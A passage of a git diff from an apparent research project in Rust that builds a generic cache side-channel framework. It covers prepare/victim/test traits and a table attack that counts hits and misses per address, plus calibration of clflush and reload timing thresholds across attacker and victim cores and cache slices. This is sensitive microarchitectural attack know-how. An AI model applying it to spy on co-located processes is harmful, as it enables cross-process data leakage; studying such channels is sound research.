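    use nix::unistd::Pid;

    struct AffinityGuard {
        old: CpuSet,
    }

    impl AffinityGuard {
        // Save the current affinity, then pin the process to `core`.
        fn pin_to(core: usize) -> nix::Result<Self> {
            let old = sched_getaffinity(Pid::from_raw(0))?;
            let mut set = CpuSet::new();
            set.set(core)?;
            sched_setaffinity(Pid::from_raw(0), &set)?;
            Ok(AffinityGuard { old })
        }
    }

    impl Drop for AffinityGuard {
        // Restore the saved affinity when the guard goes out of scope.
        fn drop(&mut self) {
            let _ = sched_setaffinity(Pid::from_raw(0), &self.old);
        }
    }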
diff --git a/cache_side_channel/Cargo.toml b/cache_side_channel/Cargo.toml
new file mode 100644
index 0000000..4a75860
--- /dev/null
+++ b/cache_side_channel/Cargo.toml
@@ -0,0 +1,9 @@
+[package]
+name = "cache_side_channel"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
diff --git a/cache_side_channel/src/lib.rs b/cache_side_channel/src/lib.rs
new file mode 100644
index 0000000..2040155
--- /dev/null
+++ b/cache_side_channel/src/lib.rs
@@ -0,0 +1,104 @@
+#![feature(specialization)]
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+use std::fmt::Debug;
+
+pub mod table_side_channel;
+
+#[derive(Debug, PartialEq, Eq, Clone, Copy)]
+pub enum CacheStatus {
+ Hit,
+ Miss,
+}
+
+#[derive(Debug, PartialEq, Eq, Clone, Copy)]
+pub enum ChannelFatalError {
+ Oops,
+}
+
+pub enum SideChannelError {
+ NeedRecalibration,
+ FatalError(ChannelFatalError),
+ AddressNotReady(*const u8),
+ AddressNotCalibrated(*const u8),
+}
+
+pub trait SingleAddrCacheSideChannel: Debug {
+ //type SingleChannelFatalError: Debug;
+ /// # Safety
+ ///
+ /// addr must be a valid pointer to read.
+    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError>;
+ /// # Safety
+ ///
+ /// addr must be a valid pointer to read.
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;
+ fn victim_single(&mut self, operation: &dyn Fn());
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn calibrate_single(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError>;
+}
+
+pub trait MultipleAddrCacheSideChannel: Debug {
+ const MAX_ADDR: u32;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn test<'a, 'b, 'c>(
+        &'a mut self,
+        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
+    ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError>;
+
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn prepare<'a, 'b, 'c>(
+        &'a mut self,
+        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
+    ) -> Result<(), SideChannelError>;
+ fn victim(&mut self, operation: &dyn Fn());
+
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError>;
+}
+
+impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {
+    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
+ let addresses = vec![addr];
+ unsafe { self.test(&mut addresses.iter()) }.map(|v| v[0].1)
+ }
+
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
+ let addresses = vec![addr];
+ unsafe { self.prepare(&mut addresses.iter()) }
+ }
+
+ fn victim_single(&mut self, operation: &dyn Fn()) {
+ self.victim(operation);
+ }
+
+    unsafe fn calibrate_single(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate(addresses) }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
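
The blanket impl above is the reason this crate keeps #![feature(specialization)]: every MultipleAddrCacheSideChannel automatically becomes a SingleAddrCacheSideChannel, and table_side_channel.rs (next file) implements TableCacheSideChannel for both, marking the single-address methods `default` so the batched impl wins. A standalone sketch of the pattern, assuming a nightly toolchain with the (incomplete) specialization feature:

    #![feature(specialization)]

    trait Single {}
    trait Multi {}

    // Every multi-address channel is also usable one address at a time.
    impl<T: Multi> Single for T {}

    trait Table {
        fn attack(&self) -> &'static str;
    }

    // Generic driver for single-address channels; `default` marks it overridable.
    impl<T: Single> Table for T {
        default fn attack(&self) -> &'static str {
            "one address per victim run"
        }
    }

    // Batched driver overrides the blanket one for multi-address channels.
    impl<T: Multi> Table for T {
        fn attack(&self) -> &'static str {
            "a batch of addresses per victim run"
        }
    }

    struct Chan;
    impl Multi for Chan {}

    fn main() {
        println!("{}", Chan.attack()); // prints the batched variant
    }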
diff --git a/cache_side_channel/src/table_side_channel.rs b/cache_side_channel/src/table_side_channel.rs
new file mode 100644
index 0000000..5538f50
--- /dev/null
+++ b/cache_side_channel/src/table_side_channel.rs
@@ -0,0 +1,219 @@
+use crate::{
+ CacheStatus, ChannelFatalError, MultipleAddrCacheSideChannel, SideChannelError,
+ SingleAddrCacheSideChannel,
+};
+
+use std::collections::HashMap;
+
+pub struct TableAttackResult {
+ pub addr: *const u8,
+ hit: u32,
+ miss: u32,
+}
+
+impl TableAttackResult {
+ pub fn get(&self, cache_status: CacheStatus) -> u32 {
+ match cache_status {
+ CacheStatus::Hit => self.hit,
+ CacheStatus::Miss => self.miss,
+ }
+ }
+}
+
+pub trait TableCacheSideChannel {
+ //type ChannelFatalError: Debug;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError>;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn attack<'a, 'b, 'c>(
+        &'a mut self,
+        addresses: impl Iterator<Item = &'c *const u8> + Clone,
+        victim: &'b dyn Fn(),
+        num_iteration: u32,
+    ) -> Result<Vec<TableAttackResult>, ChannelFatalError>;
+}
+
+impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
+    default unsafe fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate_single(addresses) }
+ }
+ //type ChannelFatalError = T::SingleChannelFatalError;
+
+    default unsafe fn attack<'a, 'b, 'c>(
+        &'a mut self,
+        addresses: impl Iterator<Item = &'c *const u8> + Clone,
+        victim: &'b dyn Fn(),
+        num_iteration: u32,
+    ) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
+ let mut result = Vec::new();
+
+ for addr in addresses {
+ let mut hit = 0;
+ let mut miss = 0;
+ for iteration in 0..100 {
+ match unsafe { self.prepare_single(*addr) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
+ },
+ }
+ self.victim_single(victim);
+ let r = unsafe { self.test_single(*addr) };
+ match r {
+ Ok(status) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => panic!(),
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => panic!(),
+ },
+ }
+ }
+ for _iteration in 0..num_iteration {
+ match unsafe { self.prepare_single(*addr) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
+ },
+ }
+ self.victim_single(victim);
+ let r = unsafe { self.test_single(*addr) };
+ match r {
+ Ok(status) => match status {
+ CacheStatus::Hit => {
+ hit += 1;
+ }
+ CacheStatus::Miss => {
+ miss += 1;
+ }
+ },
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => panic!(),
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => panic!(),
+ },
+ }
+ }
+ result.push(TableAttackResult {
+ addr: *addr,
+ hit,
+ miss,
+ });
+ }
+ Ok(result)
+ }
+}
+
+// TODO limit number of simultaneous tested address + randomise order ?
+
+impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
+    unsafe fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate(addresses) }
+ }
+ //type ChannelFatalError = T::MultipleChannelFatalError;
+
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+    unsafe fn attack<'a, 'b, 'c>(
+        &'a mut self,
+        mut addresses: impl Iterator<Item = &'c *const u8> + Clone,
+        victim: &'b dyn Fn(),
+        num_iteration: u32,
+    ) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
+ let mut v = Vec::new();
+ while let Some(addr) = addresses.next() {
+ let mut batch = Vec::new();
+ batch.push(*addr);
+ let mut hits: HashMap<*const u8, u32> = HashMap::new();
+ let mut misses: HashMap<*const u8, u32> = HashMap::new();
+ for i in 1..T::MAX_ADDR {
+ if let Some(addr) = addresses.next() {
+ batch.push(*addr);
+ } else {
+ break;
+ }
+ }
+ for i in 0..100 {
+ // TODO Warmup
+ }
+ for i in 0..num_iteration {
+ match unsafe { MultipleAddrCacheSideChannel::prepare(self, &mut batch.iter()) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(addr) => {
+ eprintln!(
+ "Addr: {:p}\n\
+ {:#?}",
+ addr, self
+ );
+ unimplemented!()
+ }
+ },
+ }
+ MultipleAddrCacheSideChannel::victim(self, victim);
+
+ let r = unsafe { MultipleAddrCacheSideChannel::test(self, &mut batch.iter()) }; // Fixme error handling
+ match r {
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => {
+ panic!();
+ }
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => {
+ panic!();
+ }
+ },
+ Ok(vector) => {
+ for (addr, status) in vector {
+ match status {
+ CacheStatus::Hit => {
+ *hits.entry(addr).or_default() += 1;
+ }
+ CacheStatus::Miss => {
+ *misses.entry(addr).or_default() += 1;
+ }
+ }
+ }
+ }
+ }
+ }
+
+ for addr in batch {
+ v.push(TableAttackResult {
+ addr,
+ hit: *hits.get(&addr).unwrap_or(&0u32),
+ miss: *misses.get(&addr).unwrap_or(&0u32),
+ })
+ }
+ }
+ Ok(v)
+ }
+}
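
A hedged usage sketch for the trait above, with a placeholder table and victim closure (the channel can be any single- or multi-address implementation thanks to the specialized impls):

    use cache_side_channel::table_side_channel::TableCacheSideChannel;
    use cache_side_channel::CacheStatus;

    // Probe one address per 64-byte line of `table` and print hit/miss counts.
    fn probe_table<C: TableCacheSideChannel>(channel: &mut C, table: &[u8], victim: &dyn Fn()) {
        let addrs: Vec<*const u8> = table.iter().step_by(64).map(|b| b as *const u8).collect();
        // Safety: every pointer comes from `table`, so it is valid to read.
        unsafe { channel.calibrate(addrs.clone()) }.unwrap();
        let results = unsafe { channel.attack(addrs.iter(), victim, 1 << 10) }.unwrap();
        for r in results {
            println!(
                "{:p}: {} hits, {} misses",
                r.addr,
                r.get(CacheStatus::Hit),
                r.get(CacheStatus::Miss)
            );
        }
    }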
diff --git a/cache_utils/extract_analysis_csv.sh b/cache_utils/extract_analysis_csv.sh
new file mode 100755
index 0000000..7002030
--- /dev/null
+++ b/cache_utils/extract_analysis_csv.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+grep '^Analysis:' "$1.txt" | cut -b 10- > "$1.csv"
+grep '^AVAnalysis:' "$1.txt" | cut -b 12- > "$1.AV.csv"
+grep '^AttackerAnalysis:' "$1.txt" | cut -b 18- > "$1.A.csv"
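
Given a run logged to foo.txt, this yields foo.csv, foo.AV.csv and foo.A.csv from the Analysis:, AVAnalysis: and AttackerAnalysis: lines that two_thread_cal prints (see the CSV output logic in the next file).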
diff --git a/cache_utils/src/bin/two_thread_cal.rs b/cache_utils/src/bin/two_thread_cal.rs
index ead1481..2f58922 100644
--- a/cache_utils/src/bin/two_thread_cal.rs
+++ b/cache_utils/src/bin/two_thread_cal.rs
@@ -1,7 +1,9 @@
use cache_utils::calibration::{
- calibrate_fixed_freq_2_thread, flush_and_reload, get_cache_slicing, load_and_flush, only_flush,
- only_reload, reload_and_flush, CalibrateOperation2T, CalibrateResult2T, CalibrationOptions,
- HistParams, Verbosity, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER,
+ accumulate, calibrate_fixed_freq_2_thread, calibration_result_to_ASVP, flush_and_reload,
+ get_cache_slicing, load_and_flush, map_values, only_flush, only_reload, reduce,
+ reload_and_flush, CalibrateOperation2T, CalibrateResult2T, CalibrationOptions, ErrorPrediction,
+ ErrorPredictions, HistParams, HistogramCumSum, PotentialThresholds, ThresholdError, Verbosity,
+ ASP, ASVP, AV, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER, SP, SVP,
};
use cache_utils::mmap::MMappedMemory;
use cache_utils::{flush, maccess, noop};
@@ -10,6 +12,7 @@ use nix::unistd::Pid;
use core::arch::x86_64 as arch_x86;
+use std::cmp::Ordering;
use std::collections::HashMap;
use std::process::Command;
use std::str::from_utf8;
@@ -49,6 +52,8 @@ struct ResultAnalysis {
pub min_error_mlh: u32,
}
+// Split the threshold and error in two separate structs ?
+
#[derive(Debug, Clone, Copy)]
struct Threshold {
pub error_rate: f32,
@@ -104,77 +109,76 @@ fn main() {
let verbose_level = Verbosity::RawResult;
- unsafe {
- let pointer = (&array[0]) as *const u8;
+ let pointer = (&array[0]) as *const u8;
+ if pointer as usize & (cache_line_size - 1) != 0 {
+ panic!("not aligned nicely");
+ }
- if pointer as usize & (cache_line_size - 1) != 0 {
- panic!("not aligned nicely");
- }
+ let operations = [
+ CalibrateOperation2T {
+            prepare: maccess::<u8>,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+            prepare: maccess::<u8>,
+ op: load_and_flush,
+ name: "clflush_shared_hit",
+ display_name: "clflush shared hit",
+ },
+ CalibrateOperation2T {
+ prepare: flush,
+ op: only_flush,
+ name: "clflush_miss_f",
+ display_name: "clflush miss - f",
+ },
+ CalibrateOperation2T {
+ prepare: flush,
+ op: load_and_flush,
+ name: "clflush_local_hit_f",
+ display_name: "clflush local hit - f",
+ },
+ CalibrateOperation2T {
+            prepare: noop::<u8>,
+ op: only_flush,
+ name: "clflush_miss_n",
+ display_name: "clflush miss - n",
+ },
+ CalibrateOperation2T {
+            prepare: noop::<u8>,
+ op: load_and_flush,
+ name: "clflush_local_hit_n",
+ display_name: "clflush local hit - n",
+ },
+ CalibrateOperation2T {
+            prepare: noop::<u8>,
+ op: flush_and_reload,
+ name: "reload_miss",
+ display_name: "reload miss",
+ },
+ CalibrateOperation2T {
+            prepare: maccess::<u8>,
+ op: reload_and_flush,
+ name: "reload_remote_hit",
+ display_name: "reload remote hit",
+ },
+ CalibrateOperation2T {
+            prepare: maccess::<u8>,
+ op: only_reload,
+ name: "reload_shared_hit",
+ display_name: "reload shared hit",
+ },
+ CalibrateOperation2T {
+            prepare: noop::<u8>,
+ op: only_reload,
+ name: "reload_local_hit",
+ display_name: "reload local hit",
+ },
+ ];
- let operations = [
- CalibrateOperation2T {
-                prepare: maccess::<u8>,
- op: only_flush,
- name: "clflush_remote_hit",
- display_name: "clflush remote hit",
- },
- CalibrateOperation2T {
-                prepare: maccess::<u8>,
- op: load_and_flush,
- name: "clflush_shared_hit",
- display_name: "clflush shared hit",
- },
- CalibrateOperation2T {
- prepare: flush,
- op: only_flush,
- name: "clflush_miss_f",
- display_name: "clflush miss - f",
- },
- CalibrateOperation2T {
- prepare: flush,
- op: load_and_flush,
- name: "clflush_local_hit_f",
- display_name: "clflush local hit - f",
- },
- CalibrateOperation2T {
-                prepare: noop::<u8>,
- op: only_flush,
- name: "clflush_miss_n",
- display_name: "clflush miss - n",
- },
- CalibrateOperation2T {
-                prepare: noop::<u8>,
- op: load_and_flush,
- name: "clflush_local_hit_n",
- display_name: "clflush local hit - n",
- },
- CalibrateOperation2T {
-                prepare: noop::<u8>,
- op: flush_and_reload,
- name: "reload_miss",
- display_name: "reload miss",
- },
- CalibrateOperation2T {
-                prepare: maccess::<u8>,
- op: reload_and_flush,
- name: "reload_remote_hit",
- display_name: "reload remote hit",
- },
- CalibrateOperation2T {
-                prepare: maccess::<u8>,
- op: only_reload,
- name: "reload_shared_hit",
- display_name: "reload shared hit",
- },
- CalibrateOperation2T {
-                prepare: noop::<u8>,
- op: only_reload,
- name: "reload_local_hit",
- display_name: "reload local hit",
- },
- ];
-
- let r = calibrate_fixed_freq_2_thread(
+ let r = unsafe {
+ calibrate_fixed_freq_2_thread(
pointer,
64, // FIXME : MAGIC
array.len() as isize >> 3, // MAGIC
@@ -190,152 +194,503 @@ fn main() {
optimised_addresses: true,
},
core_per_socket,
- );
+ )
+ };
-        let mut analysis = HashMap::<ASV, ResultAnalysis>::new();
+    //let mut analysis = HashMap::<ASV, ResultAnalysis>::new();
- let miss_name = "clflush_miss_n";
- let hit_name = "clflush_remote_hit";
+ let miss_name = "clflush_miss_n";
+ let hit_name = "clflush_remote_hit";
- let miss_index = operations
- .iter()
- .position(|op| op.name == miss_name)
- .unwrap();
- let hit_index = operations
- .iter()
- .position(|op| op.name == hit_name)
- .unwrap();
+ let miss_index = operations
+ .iter()
+ .position(|op| op.name == miss_name)
+ .unwrap();
+ let hit_index = operations
+ .iter()
+ .position(|op| op.name == hit_name)
+ .unwrap();
- let slicing = get_cache_slicing(core_per_socket);
+ let slicing = get_cache_slicing(core_per_socket);
- let h = if let Some(s) = slicing {
- if s.can_hash() {
- |addr: usize| -> u8 { slicing.unwrap().hash(addr).unwrap() }
- } else {
- panic!("No slicing function known");
- }
+ let h = if let Some(s) = slicing {
+ if s.can_hash() {
+ |addr: usize| -> u8 { slicing.unwrap().hash(addr).unwrap() }
} else {
panic!("No slicing function known");
- };
-
- for result in r {
- match result.res {
- Err(e) => {
- eprintln!("Ooops : {:#?}", e);
- panic!()
- }
- Ok(results) => {
- for r in results {
- let offset = r.offset;
- let miss_hist = &r.histogram[miss_index];
- let hit_hist = &r.histogram[hit_index];
-
- if miss_hist.len() != hit_hist.len() {
-                        panic!("Malformed results");
- }
- let len = miss_hist.len();
- let mut miss_cum_sum = vec![0; len];
- let mut hit_cum_sum = vec![0; len];
- miss_cum_sum[0] = miss_hist[0];
- hit_cum_sum[0] = hit_hist[0];
- for i in 1..len {
- miss_cum_sum[i] = miss_hist[i] + miss_cum_sum[i - 1];
- hit_cum_sum[i] = hit_hist[i] + hit_cum_sum[i - 1];
- }
- let miss_total = miss_cum_sum[len - 1];
- let hit_total = hit_cum_sum[len - 1];
-
- let mut error_miss_less_than_hit = vec![0; len - 1];
- let mut error_hit_less_than_miss = vec![0; len - 1];
-
- let mut min_error_hlm = u32::max_value();
- let mut min_error_mlh = u32::max_value();
-
- for i in 0..(len - 1) {
- error_hit_less_than_miss[i] =
- miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
- error_miss_less_than_hit[i] =
- hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
-
- if error_hit_less_than_miss[i] < min_error_hlm {
- min_error_hlm = error_hit_less_than_miss[i];
- }
- if error_miss_less_than_hit[i] < min_error_mlh {
- min_error_mlh = error_miss_less_than_hit[i];
- }
- }
-
- analysis.insert(
- ASV {
- attacker: result.main_core as u8,
- slice: h(offset as usize),
- victim: result.helper_core as u8,
- },
- ResultAnalysis {
- miss: miss_hist.clone(),
- miss_cum_sum,
- miss_total,
- hit: hit_hist.clone(),
- hit_cum_sum,
- hit_total,
- error_miss_less_than_hit,
- error_hit_less_than_miss,
- min_error_hlm,
- min_error_mlh,
- },
- );
- }
- }
- }
}
- let mut thresholds = HashMap::new();
- for (asv, results) in analysis {
- let hlm = results.min_error_hlm < results.min_error_mlh;
- let (errors, min_error) = if hlm {
- (&results.error_hit_less_than_miss, results.min_error_hlm)
- } else {
- (&results.error_miss_less_than_hit, results.min_error_mlh)
+ } else {
+ panic!("No slicing function known");
+ };
+
+    /* Analysis Flow
+    Vec<CalibrateResult2T> (or Vec<CalibrateResult>) -> Corresponding ASVP + Analysis (use the type from two_thread_cal, or similar)
+    ASVP,Analysis -> ASVP,Thresholds,Error
+    ASVP,Analysis -> ASP,Analysis (mobile victim) -> ASP, Threshold, Error -> ASVP detailed Threshold,Error in ASP model
+    ASVP,Analysis -> SP, Analysis (mobile A and V) -> SP, Threshold, Error -> ASVP detailed Threshold,Error in SP model
+    ASVP,Analysis -> AV, Analysis (legacy attack) -> AV, Threshold, Error -> ASVP detailed Threshold,Error in AV model
+    ASVP,Analysis -> Global Analysis -> Global Threshold, Error -> ASVP detailed Threshold,Error in Global model
+    The last step is done as an apply operation on the original ASVP Analysis using the new Thresholds.
+
+    This model corresponds to an attacker that can choose its core and its victim core, and has slice knowledge:
+    ASVP,Thresholds,Error -> best AV selection for average error. HashMap<AV, (ErrorPrediction, HashMap<SP, ThresholdError>)>
+
+    This model corresponds to an attacker that can choose its own core, measure victim location, and has slice knowledge:
+    ASVP,Thresholds,Error -> best A selection for average error. HashMap<usize, (ErrorPrediction, HashMap<SVP, ThresholdError>)>
+
+    Also compute the best AV pair for the AV model.
+
+    What about choosing A but not knowing V at all, from the ASP detailed analysis?
+
+    Compute averages, worst and best cases for each model?
+    */
+
+    let new_analysis: Result<HashMap<ASVP, ErrorPredictions>, nix::Error> =
+ calibration_result_to_ASVP(
+ r,
+ pointer,
+ |cal_1t_res| {
+ ErrorPredictions::predict_errors(HistogramCumSum::from_calibrate(
+ cal_1t_res, hit_index, miss_index,
+ ))
+ },
+ &h,
+ );
+
+    // Analysis aka HashMap<subset of ASVP, ErrorPredictions> -----------------------------------
+
+ let asvp_analysis = match new_analysis {
+ Ok(a) => a,
+ Err(e) => panic!("Error: {}", e),
+ };
+
+ asvp_analysis[&ASVP {
+ attacker: 0,
+ slice: 0,
+ victim: 0,
+ page: pointer as usize,
+ }]
+ .debug();
+
+ let asp_analysis = accumulate(
+ asvp_analysis.clone(),
+ |asvp: ASVP| ASP {
+ attacker: asvp.attacker,
+ slice: asvp.slice,
+ page: asvp.page,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+ let sp_analysis = accumulate(
+ asp_analysis.clone(),
+ |asp: ASP| SP {
+ slice: asp.slice,
+ page: asp.page,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+    // This one is what would happen if you ignored slices
+ let av_analysis = accumulate(
+ asvp_analysis.clone(),
+ |asvp: ASVP| AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+ let global_analysis = accumulate(
+ av_analysis.clone(),
+ |_av: AV| (),
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ )
+ .remove(&())
+ .unwrap();
+
+    // Thresholds aka HashMap<subset of ASVP, ThresholdError> -----------------------------------
+
+    let asvp_threshold_errors: HashMap<ASVP, ThresholdError> = map_values(
+ asvp_analysis.clone(),
+ |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ },
+ );
+
+ let asp_threshold_errors =
+ map_values(asp_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let sp_threshold_errors = map_values(sp_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let av_threshold_errors = map_values(av_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let gt_threshold_error = PotentialThresholds::minimizing_total_error(global_analysis)
+ .median()
+ .unwrap();
+
+ // ASVP detailed Threshold,Error in strict subset of ASVP model --------------------------------
+    // HashMap<ASVP, ThresholdError>,
+ // with the same threshold for all the ASVP sharing the same value of an ASVP subset.
+
+    let asp_detailed_errors: HashMap<ASVP, ThresholdError> = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let asp = ASP {
+ attacker: asvp.attacker,
+ slice: asvp.slice,
+ page: asvp.page,
};
+ let threshold = asp_threshold_errors[&asp].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- let mut threshold_vec = Vec::new();
+    let sp_detailed_errors: HashMap<ASVP, ThresholdError> = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let sp = SP {
+ slice: asvp.slice,
+ page: asvp.page,
+ };
+ let threshold = sp_threshold_errors[&sp].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- // refactor some of this logic into methods of analysis ?
+    let av_detailed_errors: HashMap<ASVP, ThresholdError> = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let av = AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ };
+ let threshold = av_threshold_errors[&av].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- for i in 0..errors.len() {
- if errors[i] == min_error {
- let num_true_hit;
- let num_false_hit;
- let num_true_miss;
- let num_false_miss;
- if hlm {
- num_true_hit = results.hit_cum_sum[i];
- num_false_hit = results.miss_cum_sum[i];
- num_true_miss = results.miss_total - num_false_hit;
- num_false_miss = results.hit_total - num_true_hit;
- } else {
- num_true_miss = results.miss_cum_sum[i];
- num_false_miss = results.hit_cum_sum[i];
- num_true_hit = results.hit_total - num_false_miss;
- num_false_hit = results.miss_total - num_true_miss;
- }
- threshold_vec.push(Threshold {
- threshold: i,
- is_hlm: hlm,
- num_true_hit,
- num_false_hit,
- num_true_miss,
- num_false_miss,
- error_rate: min_error as f32
- / (results.hit_total + results.miss_total) as f32,
- })
- }
- /*
+    let gt_detailed_errors: HashMap<ASVP, ThresholdError> =
+ map_values(asvp_analysis.clone(), |error_pred: ErrorPredictions, _| {
+ let threshold = gt_threshold_error.threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ });
- */
- }
- thresholds.insert(asv, threshold_vec);
+ // Best core selections
+
+    let asvp_best_av_errors: HashMap<AV, (ErrorPrediction, HashMap<SP, ThresholdError>)> =
+ accumulate(
+ asvp_threshold_errors.clone(),
+ |asvp: ASVP| AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ },
+ || (ErrorPrediction::default(), HashMap::new()),
+            |acc: &mut (ErrorPrediction, HashMap<SP, ThresholdError>),
+ threshold_error,
+ asvp: ASVP,
+ av| {
+ assert_eq!(av.attacker, asvp.attacker);
+ assert_eq!(av.victim, asvp.victim);
+ let sp = SP {
+ slice: asvp.slice,
+ page: asvp.page,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(sp, threshold_error);
+ },
+ );
+
+    let asvp_best_a_errors: HashMap<usize, (ErrorPrediction, HashMap<SVP, ThresholdError>)> =
+ accumulate(
+ asvp_threshold_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+            |acc: &mut (ErrorPrediction, HashMap<SVP, ThresholdError>),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
+    let asp_best_a_errors: HashMap<usize, (ErrorPrediction, HashMap<SVP, ThresholdError>)> =
+ accumulate(
+ asp_detailed_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+            |acc: &mut (ErrorPrediction, HashMap<SVP, ThresholdError>),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
